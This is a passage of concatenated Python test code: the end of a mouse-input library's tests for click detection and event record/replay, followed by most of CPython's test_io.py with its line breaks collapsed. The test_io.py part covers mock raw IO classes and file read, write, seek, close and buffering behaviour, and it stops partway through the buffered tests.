        self.assertFalse(self.triggers(mouse.on_click, [(DOWN, LEFT)]))
        self.assertFalse(self.triggers(mouse.on_click, [(DOWN, RIGHT)]))

        self.assertTrue(self.triggers(mouse.on_double_click, [(DOUBLE, LEFT)]))
        self.assertFalse(self.triggers(mouse.on_double_click, [(DOUBLE, RIGHT)]))
        self.assertFalse(self.triggers(mouse.on_double_click, [(DOWN, RIGHT)]))

        self.assertTrue(self.triggers(mouse.on_right_click, [(UP, RIGHT)]))
        self.assertTrue(self.triggers(mouse.on_middle_click, [(UP, MIDDLE)]))

    def test_wait(self):
        # If this fails it blocks. Unfortunately, but I see no other way of testing.
        from threading import Thread, Lock
        lock = Lock()
        lock.acquire()
        def t():
            mouse.wait()
            lock.release()
        Thread(target=t).start()
        self.press()
        lock.acquire()

    def test_record_play(self):
        from threading import Thread, Lock
        lock = Lock()
        lock.acquire()
        def t():
            self.recorded = mouse.record(RIGHT)
            lock.release()
        Thread(target=t).start()
        self.click()
        self.wheel(5)
        self.move(100, 50)
        self.press(RIGHT)
        lock.acquire()
        self.assertEqual(len(self.recorded), 5)
        self.assertEqual(self.recorded[0]._replace(time=None), ButtonEvent(DOWN, LEFT, None))
        self.assertEqual(self.recorded[1]._replace(time=None), ButtonEvent(UP, LEFT, None))
        self.assertEqual(self.recorded[2]._replace(time=None), WheelEvent(5, None))
        self.assertEqual(self.recorded[3]._replace(time=None), MoveEvent(100, 50, None))
        self.assertEqual(self.recorded[4]._replace(time=None), ButtonEvent(DOWN, RIGHT, None))

        mouse.play(self.recorded, speed_factor=0)
        events = self.flush_events()
        self.assertEqual(len(events), 5)
        self.assertEqual(events[0], (DOWN, LEFT))
        self.assertEqual(events[1], (UP, LEFT))
        self.assertEqual(events[2], ('wheel', 5))
        self.assertEqual(events[3], ('move', (100, 50)))
        self.assertEqual(events[4], (DOWN, RIGHT))

        mouse.play(self.recorded)
        events = self.flush_events()
        self.assertEqual(len(events), 5)
        self.assertEqual(events[0], (DOWN, LEFT))
        self.assertEqual(events[1], (UP, LEFT))
        self.assertEqual(events[2], ('wheel', 5))
        self.assertEqual(events[3], ('move', (100, 50)))
        self.assertEqual(events[4], (DOWN, RIGHT))

        mouse.play(self.recorded, include_clicks=False)
        events = self.flush_events()
        self.assertEqual(len(events), 2)
        self.assertEqual(events[0], ('wheel', 5))
        self.assertEqual(events[1], ('move', (100, 50)))

        mouse.play(self.recorded, include_moves=False)
        events = self.flush_events()
        self.assertEqual(len(events), 4)
        self.assertEqual(events[0], (DOWN, LEFT))
        self.assertEqual(events[1], (UP, LEFT))
        self.assertEqual(events[2], ('wheel', 5))
        self.assertEqual(events[3], (DOWN, RIGHT))

        mouse.play(self.recorded, include_wheel=False)
        events = self.flush_events()
        self.assertEqual(len(events), 4)
        self.assertEqual(events[0], (DOWN, LEFT))
        self.assertEqual(events[1], (UP, LEFT))
        self.assertEqual(events[2], ('move', (100, 50)))
        self.assertEqual(events[3], (DOWN, RIGHT))

if __name__ == '__main__':
    unittest.main()
# === file: test_io.py ===
"""Unit tests for the io module.""" # Tests of io are scattered over the test suite: # * test_bufio - tests file buffering # * test_memoryio - tests BytesIO and StringIO # * test_fileio - tests FileIO # * test_file - tests the file interface # * test_io - tests everything else in the io module # * test_univnewlines - tests universal newline support # * test_largefile - tests operations on a file greater than 2**32 bytes # (only enabled with -ulargefile) ################################################################################ # ATTENTION TEST WRITERS!!! ################################################################################ # When writing tests for io, it's important to test both the C and Python # implementations. This is usually done by writing a base test that refers to # the type it is testing as an attribute. Then it provides custom subclasses to # test both implementations. This file has lots of examples. ################################################################################ import abc import array import errno import locale import os import pickle import random import signal import sys import sysconfig import textwrap import threading import time import unittest import warnings import weakref from collections import deque, UserList from itertools import cycle, count from test import support from test.support.script_helper import ( assert_python_ok, assert_python_failure, run_python_until_end) from test.support import FakePath import codecs import io # C implementation of io import _pyio as pyio # Python implementation of io try: import ctypes except ImportError: def byteslike(*pos, **kw): return array.array("b", bytes(*pos, **kw)) else: def byteslike(*pos, **kw): """Create a bytes-like object having no string or sequence methods""" data = bytes(*pos, **kw) obj = EmptyStruct() ctypes.resize(obj, len(data)) memoryview(obj).cast("B")[:] = data return obj class EmptyStruct(ctypes.Structure): pass _cflags = 
sysconfig.get_config_var('CFLAGS') or '' _config_args = sysconfig.get_config_var('CONFIG_ARGS') or '' MEMORY_SANITIZER = ( '-fsanitize=memory' in _cflags or '--with-memory-sanitizer' in _config_args ) # Does io.IOBase finalizer log the exception if the close() method fails? # The exception is ignored silently by default in release build. IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode) def _default_chunk_size(): """Get the default TextIOWrapper chunk size""" with open(__file__, "r", encoding="latin-1") as f: return f._CHUNK_SIZE class MockRawIOWithoutRead: """A RawIO implementation without read(), so as to exercise the default RawIO.read() which calls readinto().""" def __init__(self, read_stack=()): self._read_stack = list(read_stack) self._write_stack = [] self._reads = 0 self._extraneous_reads = 0 def write(self, b): self._write_stack.append(bytes(b)) return len(b) def writable(self): return True def fileno(self): return 42 def readable(self): return True def seekable(self): return True def seek(self, pos, whence): return 0 # wrong but we gotta return something def tell(self): return 0 # same comment as above def readinto(self, buf): self._reads += 1 max_len = len(buf) try: data = self._read_stack[0] except IndexError: self._extraneous_reads += 1 return 0 if data is None: del self._read_stack[0] return None n = len(data) if len(data) <= max_len: del self._read_stack[0] buf[:n] = data return n else: buf[:] = data[:max_len] self._read_stack[0] = data[max_len:] return max_len def truncate(self, pos=None): return pos class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase): pass class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase): pass class MockRawIO(MockRawIOWithoutRead): def read(self, n=None): self._reads += 1 try: return self._read_stack.pop(0) except: self._extraneous_reads += 1 return b"" class CMockRawIO(MockRawIO, io.RawIOBase): pass class PyMockRawIO(MockRawIO, pyio.RawIOBase): pass class 
MisbehavedRawIO(MockRawIO): def write(self, b): return super().write(b) * 2 def read(self, n=None): return super().read(n) * 2 def seek(self, pos, whence): return -123 def tell(self): return -456 def readinto(self, buf): super().readinto(buf) return len(buf) * 5 class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase): pass class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase): pass class SlowFlushRawIO(MockRawIO): def __init__(self): super().__init__() self.in_flush = threading.Event() def flush(self): self.in_flush.set() time.sleep(0.25) class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase): pass class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase): pass class CloseFailureIO(MockRawIO): closed = 0 def close(self): if not self.closed: self.closed = 1 raise OSError class CCloseFailureIO(CloseFailureIO, io.RawIOBase): pass class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase): pass class MockFileIO: def __init__(self, data): self.read_history = [] super().__init__(data) def read(self, n=None): res = super().read(n) self.read_history.append(None if res is None else len(res)) return res def readinto(self, b): res = super().readinto(b) self.read_history.append(res) return res class CMockFileIO(MockFileIO, io.BytesIO): pass class PyMockFileIO(MockFileIO, pyio.BytesIO): pass class MockUnseekableIO: def seekable(self): return False def seek(self, *args): raise self.UnsupportedOperation("not seekable") def tell(self, *args): raise self.UnsupportedOperation("not seekable") def truncate(self, *args): raise self.UnsupportedOperation("not seekable") class CMockUnseekableIO(MockUnseekableIO, io.BytesIO): UnsupportedOperation = io.UnsupportedOperation class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO): UnsupportedOperation = pyio.UnsupportedOperation class MockNonBlockWriterIO: def __init__(self): self._write_stack = [] self._blocker_char = None def pop_written(self): s = b"".join(self._write_stack) self._write_stack[:] = [] return s def block_on(self, char): """Block 
when a given char is encountered.""" self._blocker_char = char def readable(self): return True def seekable(self): return True def seek(self, pos, whence=0): # naive implementation, enough for tests return 0 def writable(self): return True def write(self, b): b = bytes(b) n = -1 if self._blocker_char: try: n = b.index(self._blocker_char) except ValueError: pass else: if n > 0: # write data up to the first blocker self._write_stack.append(b[:n]) return n else: # cancel blocker and indicate would block self._blocker_char = None return None self._write_stack.append(b) return len(b) class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase): BlockingIOError = io.BlockingIOError class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase): BlockingIOError = pyio.BlockingIOError class IOTest(unittest.TestCase): def setUp(self): support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def write_ops(self, f): self.assertEqual(f.write(b"blah."), 5) f.truncate(0) self.assertEqual(f.tell(), 5) f.seek(0) self.assertEqual(f.write(b"blah."), 5) self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"Hello."), 6) self.assertEqual(f.tell(), 6) self.assertEqual(f.seek(-1, 1), 5) self.assertEqual(f.tell(), 5) buffer = bytearray(b" world\n\n\n") self.assertEqual(f.write(buffer), 9) buffer[:] = b"*" * 9 # Overwrite our copy of the data self.assertEqual(f.seek(0), 0) self.assertEqual(f.write(b"h"), 1) self.assertEqual(f.seek(-1, 2), 13) self.assertEqual(f.tell(), 13) self.assertEqual(f.truncate(12), 12) self.assertEqual(f.tell(), 13) self.assertRaises(TypeError, f.seek, 0.0) def read_ops(self, f, buffered=False): data = f.read(5) self.assertEqual(data, b"hello") data = byteslike(data) self.assertEqual(f.readinto(data), 5) self.assertEqual(bytes(data), b" worl") data = bytearray(5) self.assertEqual(f.readinto(data), 2) self.assertEqual(len(data), 5) self.assertEqual(data[:2], b"d\n") self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(20), 
b"hello world\n") self.assertEqual(f.read(1), b"") self.assertEqual(f.readinto(byteslike(b"x")), 0) self.assertEqual(f.seek(-6, 2), 6) self.assertEqual(f.read(5), b"world") self.assertEqual(f.read(0), b"") self.assertEqual(f.readinto(byteslike()), 0) self.assertEqual(f.seek(-6, 1), 5) self.assertEqual(f.read(5), b" worl") self.assertEqual(f.tell(), 10) self.assertRaises(TypeError, f.seek, 0.0) if buffered: f.seek(0) self.assertEqual(f.read(), b"hello world\n") f.seek(6) self.assertEqual(f.read(), b"world\n") self.assertEqual(f.read(), b"") f.seek(0) data = byteslike(5) self.assertEqual(f.readinto1(data), 5) self.assertEqual(bytes(data), b"hello") LARGE = 2**31 def large_file_ops(self, f): assert f.readable() assert f.writable() try: self.assertEqual(f.seek(self.LARGE), self.LARGE) except (OverflowError, ValueError): self.skipTest("no largefile support") self.assertEqual(f.tell(), self.LARGE) self.assertEqual(f.write(b"xxx"), 3) self.assertEqual(f.tell(), self.LARGE + 3) self.assertEqual(f.seek(-1, 1), self.LARGE + 2) self.assertEqual(f.truncate(), self.LARGE + 2) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 2) self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1) self.assertEqual(f.tell(), self.LARGE + 2) self.assertEqual(f.seek(0, 2), self.LARGE + 1) self.assertEqual(f.seek(-1, 2), self.LARGE) self.assertEqual(f.read(2), b"x") def test_invalid_operations(self): # Try writing on a file opened in read mode and vice-versa. 
exc = self.UnsupportedOperation for mode in ("w", "wb"): with self.open(support.TESTFN, mode) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "wb", buffering=0) as fp: self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. 
def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and 
test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(support.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(support.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 5.3) with 
self.open(support.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(support.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(support.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(support.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(support.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): record.append(1) try: f = 
super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with support.check_warnings(('', ResourceWarning)): f = MyFileIO(support.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(support.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, support.TESTFN, 'w', closefd=False) def 
test_read_closed(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") with self.open(support.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(support.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(support.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(support.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with support.check_warnings(('', ResourceWarning)): f = self.FileIO(support.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. 
zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(support.TESTFN, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(support.TESTFN, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w', 
closefd=False) os.close(fd) def test_multi_close(self): f = self.open(support.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") fd = os.open(support.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. 
def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with support.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(support.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with support.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(support.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") check_path_succeeds(FakePath(support.TESTFN)) check_path_succeeds(FakePath(os.fsencode(support.TESTFN))) with self.open(support.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): self.open(FakePath(support.TESTFN), 'rwxa') def 
def test_RawIOBase_readall(self):
    # Exercise the default unlimited RawIOBase.read() and readall()
    # implementations.
    stream = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
    self.assertEqual(stream.read(), b"abcdefg")
    stream = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
    self.assertEqual(stream.readall(), b"abcdefg")

def test_BufferedIOBase_readinto(self):
    # Exercise the default BufferedIOBase.readinto() and readinto1()
    # implementations (which call read() or read1() internally).
    class Reader(self.BufferedIOBase):
        def __init__(self, avail):
            self.avail = avail
        def read(self, size):
            result = self.avail[:size]
            self.avail = self.avail[size:]
            return result
        def read1(self, size):
            """Returns no more than 5 bytes at once"""
            return self.read(min(size, 5))
    cases = (
        # (test method, total data available, read buffer size, expected
        # read size)
        ("readinto", 10, 5, 5),
        ("readinto", 10, 6, 6),   # More than read1() can return
        ("readinto", 5, 6, 5),    # Buffer larger than total available
        ("readinto", 6, 7, 6),
        ("readinto", 10, 0, 0),   # Empty buffer
        ("readinto1", 10, 5, 5),  # Result limited to single read1() call
        ("readinto1", 10, 6, 5),  # Buffer larger than read1() can return
        ("readinto1", 5, 6, 5),   # Buffer larger than total available
        ("readinto1", 6, 7, 5),
        ("readinto1", 10, 0, 0),  # Empty buffer
    )
    UNUSED_BYTE = 0x81
    for case in cases:
        with self.subTest(case):
            name, avail, request, result = case
            reader = Reader(bytes(range(avail)))
            buffer = bytearray((UNUSED_BYTE,) * request)
            self.assertEqual(getattr(reader, name)(buffer), result)
            self.assertEqual(len(buffer), request)
            self.assertSequenceEqual(buffer[:result], range(result))
            untouched = (UNUSED_BYTE,) * (request - result)
            self.assertSequenceEqual(buffer[result:], untouched)
            self.assertEqual(len(reader.avail), avail - result)

def test_close_assert(self):
    class R(self.IOBase):
        def __setattr__(self, name, value):
            pass
        def flush(self):
            raise OSError()
    f = R()
    # This would cause an assertion failure.
    self.assertRaises(OSError, f.close)
    # Silence destructor error
    R.flush = lambda self: None
self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): 
